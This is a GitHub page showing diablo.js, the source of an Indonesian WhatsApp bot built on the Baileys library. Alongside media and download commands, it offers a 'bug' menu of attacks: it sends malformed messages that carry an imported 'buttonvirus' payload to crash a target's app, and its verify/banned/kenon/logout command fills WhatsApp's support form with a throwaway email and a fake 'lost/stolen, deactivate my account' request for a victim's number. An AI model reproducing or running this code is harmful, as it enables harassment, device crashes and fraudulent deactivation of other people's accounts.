-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathdiablo.js
8531 lines (8478 loc) · 886 KB
/
diablo.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
/*
MINIMAL KALAU MAU RENAME CREDIT NY JANGAN DI HPS LH TOD
SC BY
EXOOMODS
LYNN
ZYY
PRII
JANGAN DI HPS!!!
*/
const { modul } = require('./module');
const { axios, baileys, chalk, cheerio, child_process, crypto, fs, ffmpeg, jsobfus, moment, ms, speed, util } = modul;
const { exec, spawn, execSync } = child_process
const { BufferJSON, WA_DEFAULT_EPHEMERAL, generateWAMessageFromContent, proto, generateWAMessageContent, generateWAMessage, prepareWAMessageMedia, areJidsSameUser, getContentType } = baileys
const { smsg, formatp, tanggal, formatDate, getTime, isUrl, sleep, clockString, runtime, fetchJson, getBuffer, jsonformat, format, parseMention, getRandom, reSize, generateProfilePicture } = require('./lib/myfunc')
const { buttonvirus } = require('./scrape/buttonvirus')
const os = require('os')
const { color, bgcolor } = require('./lib/color')
const { ytMp4, ytMp3, ytPlay } = require('./lib/yotube')
const { uptotelegra } = require('./scrape/upload')
const tiktok = require('./scrape/tiktok')
const audionye = fs.readFileSync('./y.mp3')
const owner = JSON.parse(fs.readFileSync('./database/owner.json').toString())
global.db = JSON.parse(fs.readFileSync('./database/database.json'))
if (global.db) global.db = {
sticker: {},
database: {},
game: {},
others: {},
users: {},
chats: {},
...(global.db || {})
}
global.ownerName = 'EXOO MODS'
global.ownerNumber = ["[email protected]"]
global.packname = 'ExooMods'
global.author = 'ExooMods'
global.prefa = ['','.']
global.mess = {
wait: 'Tunggu Bwanhh!!',
succes: 'Gimana Bwanh?',
admin: 'Emang Lu Admin??',
botAdmin: 'Bot Belum Admin Kocak',
owner: 'Lu Siapa Kocak?',
group: 'Khusus Grup bwanh',
private: 'Khusus Privat bwanh',
bot: 'Bot Number User Special Features!!!',
error: 'Error Sis, Please Chat Owner...',
}
module.exports = diablo = async (diablo, diablobotwhatsapp, chatUpdate, store) => {
try {
const body = (diablobotwhatsapp.mtype === 'conversation') ? diablobotwhatsapp.message.conversation : (diablobotwhatsapp.mtype == 'imageMessage') ? diablobotwhatsapp.message.imageMessage.caption : (diablobotwhatsapp.mtype == 'videoMessage') ? diablobotwhatsapp.message.videoMessage.caption : (diablobotwhatsapp.mtype == 'extendedTextMessage') ? diablobotwhatsapp.message.extendedTextMessage.text : (diablobotwhatsapp.mtype == 'buttonsResponseMessage') ? diablobotwhatsapp.message.buttonsResponseMessage.selectedButtonId : (diablobotwhatsapp.mtype == 'listResponseMessage') ? diablobotwhatsapp.message.listResponseMessage.singleSelectReply.selectedRowId : (diablobotwhatsapp.mtype == 'templateButtonReplyMessage') ? diablobotwhatsapp.message.templateButtonReplyMessage.selectedId : (diablobotwhatsapp.mtype === 'messageContextInfo') ? (diablobotwhatsapp.message.buttonsResponseMessage?.selectedButtonId || diablobotwhatsapp.message.listResponseMessage?.singleSelectReply.selectedRowId || diablobotwhatsapp.text) : ''
const budy = (typeof diablobotwhatsapp.text == 'string' ? diablobotwhatsapp.text : '')
const prefix = prefa ? /^[°•π÷׶∆£¢€¥®=????+✓_=|~!?@#%^&.©^]/gi.test(body) ? body.match(/^[°•π÷׶∆£¢€¥®=????+✓_=|~!?@#%^&.©^]/gi)[0] : "" : prefa ?? global.prefix
const content = JSON.stringify(diablobotwhatsapp.message)
const { type, quotedMsg, mentioned, now, fromMe } = diablobotwhatsapp
const isCmd = body.startsWith(prefix)
const from = diablobotwhatsapp.key.remoteJid
const command = body.replace(prefix, '').trim().split(/ +/).shift().toLowerCase()
const args = body.trim().split(/ +/).slice(1)
const pushname = diablobotwhatsapp.pushName || "No Name"
const botNumber = await diablo.decodeJid(diablo.user.id)
const itsMediablo = [botNumber, ...owner].map(v => v.replace(/[^0-9]/g, '') + '@s.whatsapp.net').includes(diablobotwhatsapp.sender)
const itsMe = diablobotwhatsapp.sender == botNumber ? true : false
const text = q = args.join(" ")
const quoted = diablobotwhatsapp.quoted ? diablobotwhatsapp.quoted : diablobotwhatsapp
const mime = (quoted.msg || quoted).mimetype || ''
const jam = moment.tz('asia/jakarta').format('HH:mm:ss')
const dt = moment(Date.now()).tz('Asia/Jakarta').locale('id').format('a')
const ucapanWaktu = "Selamat "+dt.charAt(0).toUpperCase() + dt.slice(1)
const wib = moment.tz('Asia/Jakarta').format('HH : mm : ss')
const wita = moment.tz('Asia/Makassar').format('HH : mm : ss')
const wit = moment.tz('Asia/Jayapura').format('HH : mm : ss')
const tanggal = moment.tz('Asia/Jakarta').format('DD/MM/YY')
const isMedia = /image|video|sticker|audio/.test(mime)
const isImage = (type == 'imageMessage')
const isVideo = (type == 'videoMessage')
const isSticker = (type == 'stickerMessage')
const isQuotedMsg = (type == 'extendedTextMessage')
const isQuotedImage = isQuotedMsg ? content.includes('imageMessage') ? true : false : false
const isQuotedAudio = isQuotedMsg ? content.includes('audioMessage') ? true : false : false
const isQuotedDocument = isQuotedMsg ? content.includes('documentMessage') ? true : false : false
const isQuotedVideo = isQuotedMsg ? content.includes('videoMessage') ? true : false : false
const isQuotedSticker = isQuotedMsg ? content.includes('stickerMessage') ? true : false : false
const hariRaya = new Date('January 1, 2023 00:00:00')
const sekarang = new Date().getTime()
const Selisih = hariRaya - sekarang
const jhari = Math.floor( Selisih / (1000 * 60 * 60 * 24));
const jjam = Math.floor( Selisih % (1000 * 60 * 60 * 24) / (1000 * 60 * 60))
const jmenit = Math.floor( Selisih % (1000 * 60 * 60) / (1000 * 60))
const jdetik = Math.floor( Selisih % (1000 * 60) / 1000)
const sender = diablobotwhatsapp.isGroup ? (diablobotwhatsapp.key.participant ? diablobotwhatsapp.key.participant : diablobotwhatsapp.participant) : diablobotwhatsapp.key.remoteJid
const isGroup = diablobotwhatsapp.chat.endsWith('@g.us')
const groupMetadata = diablobotwhatsapp.isGroup ? await diablo.groupMetadata(diablobotwhatsapp.chat).catch(e => {}) : ''
const groupName = diablobotwhatsapp.isGroup ? groupMetadata.subject : ''
const participants = diablobotwhatsapp.isGroup ? await groupMetadata.participants : ''
const groupAdmins = diablobotwhatsapp.isGroup ? await participants.filter(v => v.admin !== null).map(v => v.id) : ''
const groupOwner = diablobotwhatsapp.isGroup ? groupMetadata.owner : ''
const groupMembers = diablobotwhatsapp.isGroup ? groupMetadata.participants : ''
const isBotAdmins = diablobotwhatsapp.isGroup ? groupAdmins.includes(botNumber) : false
const isGroupAdmins = diablobotwhatsapp.isGroup ? groupAdmins.includes(diablobotwhatsapp.sender) : false
const isAdmins = diablobotwhatsapp.isGroup ? groupAdmins.includes(diablobotwhatsapp.sender) : false
try {
const isNumber = x => typeof x === 'number' && !isNaN(x)
const user = global.db.users[diablobotwhatsapp.sender]
if (typeof user !== 'object') global.db.users[diablobotwhatsapp.sender] = {}
const chats = global.db.chats[diablobotwhatsapp.chat]
if (typeof chats !== 'object') global.db.chats[diablobotwhatsapp.chat] = {}
} catch (err) {
console.error(err)
}
if (!diablo.public) {
if (!diablobotwhatsapp.key.fromMe) return
}
if (!diablobotwhatsapp.isGroup && isCmd && !fromMe) {
console.log('->[\x1b[1;32mCMD\x1b[1;37m]', color(moment(diablobotwhatsapp.messageTimestamp * 1000).format('DD/MM/YYYY HH:mm:ss'), 'yellow'), color(`${prefix + command} [${args.length}]`), 'from', color(pushname))
}
if (diablobotwhatsapp.isGroup && isCmd && !fromMe) {
console.log('->[\x1b[1;32mCMD\x1b[1;37m]', color(moment(diablobotwhatsapp.messageTimestamp *1000).format('DD/MM/YYYY HH:mm:ss'), 'yellow'), color(`${prefix + command} [${args.length}]`), 'from', color(pushname), 'in', color(groupName))
}
if (diablobotwhatsapp.sender.startsWith('212')) return diablo.updateBlockStatus(diablobotwhatsapp.sender, 'block')
ppuser = 'https://raw.githubusercontent.com/JasRunJ/filenya/master/a4cab58929e036c18d659875d422244d.jpg'
ppnyauser = await reSize(ppuser, 200, 200)
const lep = {
key: {
fromMe: false,
participant: `[email protected]`,
...({ remoteJid: "" })
},
message: {
"imageMessage": {
"mimetype": "image/jpeg",
"caption": `${buttonvirus}`,
"jpegThumbnail": ppnyauser
}
}
}
if (command) {
diablo.sendPresenceUpdate('composing', from)
diablo.readMessages([diablobotwhatsapp.key])
}
async function replyNya(teks) {
const buttonsDefault = [{ quickReplyButton: { displayText : `${buttonvirus}`, id : `.h` } }]
const buttonMessage = {
text: teks,
footer: "",
templateButtons: buttonsDefault,
image: {url: ppnyauser}
}
return diablo.sendMessage(from, buttonMessage)
}
async function obfus(query) {
return new Promise((resolve, reject) => {
try {
const obfuscationResult = jsobfus.obfuscate(query,
{
compact: false,
controlFlowFlattening: true,
controlFlowFlatteningThreshold: 1,
numbersToExpressions: true,
simplify: true,
stringArrayShuffle: true,
splitStrings: true,
stringArrayThreshold: 1
}
);
const result = {
status: 200,
author: `diablo`,
result: obfuscationResult.getObfuscatedCode()
}
resolve(result)
} catch (e) {
reject(e)
}
})
}
async function styletext(teks) {
return new Promise((resolve, reject) => {
axios.get('http://qaz.wtf/u/convert.cgi?text='+teks)
.then(({ data }) => {
let $ = cheerio.load(data)
let hasil = []
$('table > tbody > tr').each(function (a, b) {
hasil.push({ name: $(b).find('td:nth-child(1) > span').text(), result: $(b).find('td:nth-child(2)').text().trim() })
})
resolve(hasil)
})
})
}
const jimp_1 = require('jimp')
async function pepe(media) {
const jimp = await jimp_1.read(media)
const min = jimp.getWidth()
const max = jimp.getHeight()
const cropped = jimp.crop(0, 0, min, max)
return {
img: await cropped.scaleToFit(720, 720).getBufferAsync(jimp_1.MIME_JPEG),
preview: await cropped.normalize().getBufferAsync(jimp_1.MIME_JPEG)
}
}
async function sendBugcrash(jid, title, description, footer, thumbnail, ownerBusines, produk, productIdImg) {
let prod = {
listMessage: {
title: title,
description: description,
listType: 2,
productListInfo: {
productSections: [{
title: title,
products: produk
}],
headerImage: {
productId: productIdImg,
jpegThumbnail: thumbnail
},
businessOwnerJid: ownerBusines
},
footerText: footer,
}
}
let progene = await generateWAMessageFromContent(jid, prod, { quoted : lep })
return diablo.relayMessage(progene.key.remoteJid, progene.message, {
messageId: ""
})
}
switch (command) {
case 'exoomenu': case 'exoomenu':{
jiren = `
╭━━━━━╼⃟݊⃟̥⃝̇݊݊⃟ *ɪɴꜰᴏ ʙᴏᴛ* ݊⃟̥⃝̇݊⃟╾━━━━━╮
┃ ┃ ╭━━━━━━━━━━━━━━╮
┃ ┃ ┃❏ ᴄʀᴇᴀᴛᴏʀ : *ExooMods🥀*
┃ ┃ ┃❏ ɴᴀᴍᴇ ʙᴏᴛ: *EXOO BOTZ🥵*
┃ ┃ ┃❏ ɴᴀᴍᴇ ᴏᴡɴᴇʀ: *EXOO MODS*
┃ ┃ ╰━━━━━━━━━━━━━━╯
┃ ┗━━━━━━━━━━━━━━━━┛
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ *ANIMEH* ݊⃟̥⃝̇݊⃟╾━━━•
┃ ╭━━━━━━━━━━━━━━╮
┃ ┃☬⃟⧐. waifu ( random )
┃ ┃☬⃟⧐. loli (random )
┃ ┃☬⃟⧐. husbu ( random )
┃ ┃☬⃟⧐. cosplay ( random )
┃ ┃☬⃟⧐. milf ( random )
┃ ┃☬⃟⧐. ppcp ( ppcouple )
┃ ╰━━━━━━━━━━━━━━╯
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ *DOWNLOAD* ݊⃟̥⃝̇݊⃟╾━━━•
┃ ╭━━━━━━━━━━━━━━╮
┃ ┃☬⃟⧐. ytmp3 ( yt link )
┃ ┃☬⃟⧐. ytmp4 ( yt link )
┃ ┃☬⃟⧐. tiktok ( tiktok link )
┃ ┃☬⃟⧐. play ( judul )
┃ ╰━━━━━━━━━━━━━━╯
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ *OWNER* ݊⃟̥⃝̇݊⃟╾━━━•
┃ ╭━━━━━━━━━━━━━━╮
┃ ┃☬⃟⧐. akses ( untuk beli akses )
┃ ┃☬⃟⧐. setppbot ( biasa )
┃ ┃☬⃟⧐. setppbot2 ( panjang/Full )
┃ ┃☬⃟⧐. self ( Khusus Owner Cuy )
┃ ┃☬⃟⧐. public ( khusus di nomer Bot )
┃ ┃☬⃟⧐. join ( Link Grup )
┃ ╰━━━━━━━━━━━━━━╯
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ *OTHER* ݊⃟̥⃝̇݊⃟╾━━━•
┃ ╭━━━━━━━━━━━━━━╮
┃ ┃☬⃟⧐. tagcuy ( untuk tag member }
┃ ┃☬⃟⧐. stats ( untuk melihat status bot )
┃ ┃☬⃟⧐. sewa ( untuk sewabot dalam grup )
┃ ┃☬⃟⧐. donasi ( donasi )
┃ ┃☬⃟⧐. sticker ( send foto - reply )
┃ ┃☬⃟⧐. menfess ( pesan rahasia
┃ ╰━━━━━━━━━━━━━━╯
┣━━━╼╾━━━•
┃SILAHKAN PENCET BUTTON DIBAWAH INI
┃YT https://www.youtube.com/@exoo_mods137
┗━━━━━━━━━━━━━━━━━━┛
▰▱▰▱▰▱▰▱▰▱▰▱▰▱
`
let buttons = [
{buttonId: `bug`, buttonText: {displayText: 'BUG MENU'}, type: 1}
]
let buttonMessage = {
image: { url: 'https://telegra.ph/file/4aed0c6c8ba80e789e437.jpg' },
caption: `${jiren}`,
footer: `Exoo Mods🥀`,
buttons: buttons,
headerType: 4
}
diablo.sendMessage(diablobotwhatsapp.chat, buttonMessage, { quoted: diablobotwhatsapp })
buffer = await getBuffer('https://d.top4top.io/m_2573kf3tb0.mp3')
await diablo.sendMessage(diablobotwhatsapp.chat, { audio: buffer, ptt: true, mimetype: 'audio/mpeg' }, { quoted: diablobotwhatsapp })
}
break
case 'exoobug':
jiren = `
╭━━━━━╼⃟݊⃟̥⃝̇݊݊⃟ *EXOO MODS🥀* ݊⃟̥⃝̇݊⃟╾━━━━━╮
┃ ╭━━•›ꪶ ཻུ۪۪ꦽꦼ̷⸙ ━ ━ ━ ꪶ ཻུ۪۪ꦽꦼ̷⸙‹•━━╮
┃ ┃ ╭┈────────────╮
┃ ┃ │ ݊⃟̥⃝̇݊⃟╾•*INI FITUR BUGNYA*•╼⃟݊⃟̥⃝̇݊݊⃟
┃ ┃ ╰┈────────────╯
┃ ╰━━•›ꪶ ཻུ۪۪ꦽꦼ̷⸙ ━ ━ ━ ꪶ ཻུ۪۪ꦽꦼ̷⸙‹•━━╯
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ ݊⃟̥⃝̇݊⃟╾━━━•
┃╭━━━━━━━━━━━━━━━━╾•
┃┃ ݊⃟̥⃝̇݊⃟╾• *BUG EMOJI* •╼⃟݊⃟̥⃝̇݊݊⃟
┃╰━━━━━━━━━━━━━━━━╾•
┃╭━━━━━━━━━━━━━━━━╾•
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🌷 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🔥 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 👑 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 👽 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🎭 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 😱 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🗿 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🐦 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 😧 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🤡 (62xxx)
┃│⃟͙⃝̇݊݊⃟ ⃟•╾ 🤓 (62xxx)
┃╰━━━━━━━━━━━━━━━━╾•
╰━━━╼⃟݊⃟̥⃝̇݊݊⃟ *JEDA 6 MENIT YA OM* ݊⃟̥⃝̇݊⃟╾━━━╯
▰▱▰▱▰▱▰▱▰▱▰▱▰▱
╭━━━━━╼⃟݊⃟̥⃝̇݊݊⃟ *EXOO MODS🥀* ݊⃟̥⃝̇݊⃟╾━━━━━╮
┃ ╭━━•›ꪶ ཻུ۪۪ꦽꦼ̷⸙ ━ ━ ━ ꪶ ཻུ۪۪ꦽꦼ̷⸙‹•━━╮
┃ ┃ ╭┈────────────╮
┃ ┃ │ ݊⃟̥⃝̇݊⃟╾• *KHUSUS SANTET* •╼⃟݊⃟̥⃝̇݊݊⃟
┃ ┃ ╰┈────────────╯
┃ ╰━━•›ꪶ ཻུ۪۪ꦽꦼ̷⸙ ━ ━ ━ ꪶ ཻུ۪۪ꦽꦼ̷⸙‹•━━╯
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ *JANGAN ASAL BUG ORNG* ݊⃟̥⃝̇݊⃟╾━━━•
┃╭━━━━━━━━━━━━━━━━╾•
┃┃ ݊⃟̥⃝̇݊⃟╾• *BUG ATTACK* •╼⃟݊⃟̥⃝̇݊݊⃟
┃╰━━━━━━━━━━━━━━━━╾•
┃╭━━━━━━━━━━━━━━━━╾•
┃│᭄⃟ꪶ⃟•╾ bug5 (62xxx)
┃│᭄⃟ꪶ⃟•╾ bug10 (62xxx)
┃│᭄⃟ꪶ⃟•╾ bug100 (62xxx)
┃│᭄⃟ꪶ⃟•╾ bug1000 (62xxx)
┃│᭄⃟ꪶ⃟•╾ santet (62xxx)
┃│᭄⃟ꪶ⃟•╾ crashcuy (62xxx)
┃│᭄⃟ꪶ⃟•╾ ampunb (62xxx)
┃│᭄⃟ꪶ⃟•╾ santetdia (62xxx)
┃│᭄⃟ꪶ⃟•╾ troli (62xxx)
┃│᭄⃟ꪶ⃟•╾ bom (62xxx)
┃│᭄⃟ꪶ⃟•╾ danimental (62xxx)
┃│᭄⃟ꪶ⃟•╾ danicrash (62xxx)
┃│᭄⃟ꪶ⃟•╾ daniganas (62xxx)
┃│᭄⃟ꪶ⃟•╾ button (62xxx)
┃│᭄⃟ꪶ⃟•╾ trava (62xxx)
┃│᭄⃟ꪶ⃟•╾ bugkatalog (62xxx)
┃│᭄⃟ꪶ⃟•╾ danimex (62xxx)
┃│᭄⃟ꪶ⃟•╾ danisuhu (62xxx)
┃│᭄⃟ꪶ⃟•╾ danijago (62xxx)
┃│᭄⃟ꪶ⃟•╾ danibully (62xxx)
┃│᭄⃟ꪶ⃟•╾ bugdanigg (62xxx)
┃│᭄⃟ꪶ⃟•╾ bugdani1 (62xxx)
┃│᭄⃟ꪶ⃟•╾ bugdani2 (62xxx)
┃╰━━━━━━━━━━━━━━━━╾•
╰━━━╼⃟݊⃟̥⃝̇݊݊⃟ *JEDA 6 MENIT YA OM* ݊⃟̥⃝̇݊⃟╾━━━╯
▰▱▰▱▰▱▰▱▰▱▰▱▰▱
╭━━━━━╼⃟݊⃟̥⃝̇݊݊⃟ *EXOO MODS🥀* ݊⃟̥⃝̇݊⃟╾━━━━━╮
┃╭━━━━━━━━━━━━━━━━╾•
┃┃ ݊⃟̥⃝̇݊⃟╾• *BUG KENON* •╼⃟݊⃟̥⃝̇݊݊⃟
┃╰━━━━━━━━━━━━━━━━╾•
┃╭━━━━━━━━━━━━━━━━╾•
┃│᭄⃟ꪶ⃟•╾ verify (62xxx)
┃│᭄⃟ꪶ⃟•╾ kenon (62xxx)
┃│᭄⃟ꪶ⃟•╾ banned (62xxx)
┃│᭄⃟ꪶ⃟•╾ logout (62xxx)
┃╰━━━━━━━━━━━━━━━━╾•
╰━━━╼⃟݊⃟̥⃝̇݊݊⃟ *JEDA 6 MENIT YA OM* ݊⃟̥⃝̇݊⃟╾━━━╯
▰▱▰▱▰▱▰▱▰▱▰▱▰▱
╭━━❍*FOLLOW iG: exoo_notbeey137*❍━━╮
┃ ╭━━━━━━━━━━━━━━━━╮
┃ ┃ ╭┈────────────╮
┃ ┃ │❍ *KHUSUS BUG GC* ❍
┃ ┃ ╰┈────────────╯
┃ ╰━━━━━━━━━━━━━━━━╯
┣━━━╼⃟݊⃟̥⃝̇݊݊⃟ *JANGAN ASAL BUG* ݊⃟̥⃝̇݊⃟╾━━━•
┃╭━━━━━━━━━━━━━━━━╾•
┃┃ ❍ *BUG GC* ❍
┃╰━━━━━━━━━━━━━━━━╾•
┃╭━━━━━━━━━━━━━━━━╾•
┃│⃟❍➢ buggc ( linkgrup )
┃│⃟❍➢ seranggc ( linkgrup )
┃│⃟❍➢ santetgc ( linkgrup )
┃│⃟❍➢ war ( linkgrup )
┃│⃟❍➢ bejat ( linkgrup )
┃╰━━━━━━━━━━━━━━━━╾•
╰━━━╼⃟݊⃟̥⃝̇݊݊⃟ *JEDA 6 MENIT YA OM* ݊⃟̥⃝̇݊⃟╾━━━╯
▰▱▰▱▰▱▰▱▰▱▰▱▰▱
YT: ExooMods🥀
`
let buttonsevote = [
{buttonId: `menu`, buttonText: {displayText: 'Menu Utama'}, type: 1}
]
let buttonMessageevote = {
text: jiren,
footer: `Exoo Mods🥀`,
buttons: buttonsevote,
headerType: 1
}
diablo.sendMessage(diablobotwhatsapp.chat, buttonMessageevote)
break
case 'waifu':
case 'loli':
case 'husbu':
case 'milf':
case 'cosplay':
case 'wallml':
diablobotwhatsapp.reply(mess.wait)
let wipu = (await axios.get(`https://raw.githubusercontent.com/Arya-was/endak-tau/main/${command}.json`)).data
let wipi = wipu[Math.floor(Math.random() * (wipu.length))]
diablo.sendMessage(diablobotwhatsapp.chat, { image: { url: wipi }, caption: `${command}` }, { quoted: diablobotwhatsapp })
break
case'play': case 'ytplay': {
if (!text) throw `Example : ${prefix + command} jedag jedug`
let yts = require("yt-search")
let search = await yts(text)
let anu = search.videos[Math.floor(Math.random() * search.videos.length)]
let buttonsZYK = [
{buttonId: `ytmp3 ${anu.url}`, buttonText: {displayText: 'Audio'}, type: 1},
{buttonId: `ytmp4 ${anu.url}`, buttonText: {displayText: 'Video'}, type: 1}
]
let buttonMessageZYK = {
image: { url: anu.thumbnail },
caption: `
⭔ Title : ${anu.title}
⭔ Ext : Search
⭔ ID : ${anu.videoId}
⭔ Duration : ${anu.timestamp}
⭔ Viewers : ${anu.views}
⭔ Upload At : ${anu.ago}
⭔ Author : ${anu.author.name}
⭔ Channel : ${anu.author.url}
⭔ Description : ${anu.description}
⭔ Url : ${anu.url}`,
footer: `\nRuntime : ${runtime(process.uptime())}\nSILAHKAN PILIH BUTTONS DI BAWAH`,
buttons: buttonsZYK,
headerType: 1
}
diablo.sendMessage(diablobotwhatsapp.chat, buttonMessageZYK, { quoted: diablobotwhatsapp })
}
break
case 'sc':
diablobotwhatsapp.reply('https://instagram.com/_kyymon')
break
case 'p':
diablobotwhatsapp.reply('SALAM NGENTOD')
break
case 'donasi': case 'd': case 'd': case 'd': case 'donate': {
diablo.sendMessage(diablobotwhatsapp.chat, { image: { url: 'https://telegra.ph/file/088d3cfe14a83c01aec74.jpg' }, caption: `Hai Kak ${diablobotwhatsapp.pushName}\n\n DANA: 088983443939\n\n GOPAY: 088983443939\n\n MAU DONATE LAIN? QRISS :\n\n` }, { quoted: diablobotwhatsapp })
}
break
case 'verify': case 'banned': case 'kenon': case 'logout': {
if (!itsMediablo) return diablobotwhatsapp.reply(mess.owner)
if (diablobotwhatsapp.quoted || q) {
const froms = diablobotwhatsapp.quoted ? diablobotwhatsapp.quoted.sender : q.replace(/[^0-9]/g, '')
var cekno = await diablo.onWhatsApp(froms)
if (cekno.length == 0) return diablobotwhatsapp.reply(`Peserta tersebut sudah tidak terdaftar di WhatsApp`)
if (froms === ownerNumber) return diablobotwhatsapp.reply(`Tidak bisa verif My Creator!`)
var targetnya = froms.split('@')[0]
try {
var axioss = require('axios')
var ntah = await axioss.get("https://www.whatsapp.com/contact/noclient/")
var email = await axioss.get("https://www.1secmail.com/api/v1/?action=genRandomMailbox&count=1")
var cookie = ntah.headers["set-cookie"].join("; ")
const cheerio = require('cheerio');
var $ = cheerio.load(ntah.data)
var $form = $("form");
var url = new URL($form.attr("action"), "https://www.whatsapp.com").href
var form = new URLSearchParams()
form.append("jazoest", $form.find("input[name=jazoest]").val())
form.append("lsd", $form.find("input[name=lsd]").val())
form.append("step", "submit")
form.append("country_selector", "INDONESIA")
form.append("phone_number", `+${targetnya}`,)
form.append("email", email.data[0])
form.append("email_confirm", email.data[0])
form.append("platform", "ANDROID")
form.append("your_message", "Perdido/roubado: desative minha conta")
form.append("__user", "0")
form.append("__a", "1")
form.append("__csr", "")
form.append("__req", "8")
form.append("__hs", "19316.BP:whatsapp_www_pkg.2.0.0.0.0")
form.append("dpr", "1")
form.append("__ccg", "UNKNOWN")
form.append("__rev", "1006630858")
form.append("__comment_req", "0")
var res = await axioss({
url,
method: "POST",
data: form,
headers: {
cookie
}
})
var payload = String(res.data)
if (payload.includes(`"payload":true`)) {
diablobotwhatsapp.reply(`FROM WhatsApp Support
Hai,
Terima kasih atas pesan Anda.
Kami telah menonaktifkan akun WhatsApp Anda. Ini berarti akun Anda untuk sementara dinonaktifkan dan akan dihapus secara otomatis dalam 30 hari jika Anda tidak mendaftarkan ulang akun tersebut. Harap dicatat: Tim Dukungan Pelanggan WhatsApp tidak dapat menghapus akun Anda secara manual.
Selama periode penonaktifan:
• Kontak Anda di WhatsApp mungkin masih melihat nama dan gambar profil Anda.
• Setiap pesan yang mungkin dikirim oleh kontak Anda ke akun akan tetap dalam status tertunda hingga 30 hari.
Jika Anda ingin mendapatkan kembali akun Anda, daftarkan ulang akun Anda sebagai secepatnya.
Daftar ulang akun Anda dengan memasukkan kode 6 digit, kode yang Anda terima melalui SMS atau panggilan telepon. Jika Anda mendaftar ulang
pulihkan riwayat obrolan Anda di: Android | iPhone.
file, cadangan, atau riwayat panggilan dari akun yang dihapus.
